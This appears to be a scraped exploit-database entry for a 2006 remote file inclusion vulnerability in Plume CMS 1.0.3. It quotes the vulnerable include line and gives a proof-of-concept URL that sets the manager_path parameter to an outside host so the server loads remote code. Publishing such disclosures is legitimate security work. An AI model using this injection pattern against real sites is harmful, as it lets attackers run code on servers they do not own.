Plume CMS 1.0.3 - 'manager_path' Remote File Inclusion
| EKU-ID: 9851 | CVE: OSVDB-23204;CVE-2006-2645;CVE-2006-0725 | OSVDB-ID: |
| Author: beford | Published: 2006-05-26 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 9851 | CVE: OSVDB-23204;CVE-2006-2645;CVE-2006-0725 | OSVDB-ID: |
| Author: beford | Published: 2006-05-26 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Vendor: Plume CMS http://plume-cms.net Vuln: Remote File Include Discovered: beford <xbefordx gmail com> Vulnerable File/Code ./plume-1.0.3/manager/frontinc/prepend.php [code] include_once $_PX_config['manager_path'].'/conf/config.php'; [/code] http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet # milw0rm.com [2006-05-26]